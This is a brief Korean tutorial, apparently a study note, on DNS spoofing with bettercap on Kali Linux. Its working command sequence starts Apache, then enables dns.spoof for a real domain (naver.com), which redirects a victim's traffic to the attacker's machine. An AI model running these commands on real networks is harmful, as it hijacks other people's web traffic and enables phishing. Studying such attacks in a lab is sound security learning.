DNS 스푸핑이란?

DNS 스푸핑은 타겟 컴퓨터가 DNS 서버로 가기전에 해커를 거치게 해서 응답을 조작하여 사용자가 특정 웹사이트에 접속할 때 특정 IP 주소로 반환하도록 만드는 공격 기법이다.

칼리 리눅스는 기본적으로 자체 웹 서버를 제공하기 때문에 웹 서버를 열고 IP를 제공할 것이다.

웹 서버 열기

service apache2 start

이제 자신의 아이피로 접속해보면 /var/www/html/index.html 페이지가 열린다

DNS 스푸핑하기

bettercap 실행

bettercap -iface [인터페이스] -caplet [cap 파일명]

dns 스푸핑 하기

set dns.spoof.all true
모든 DNS 요청에 대해 bettercap이 응답

set dns.spoof.domains [도메인주소]
예) set dns.spoof.domains naver.com,*.naver.com
해당 도메인주소로 접속 시 스푸핑 적용

dns.spoof on

1~2분 후, 이제 타겟 컴퓨터는 네이버로 접속하면 칼리머신의 아이피로 리다이렉션 된다.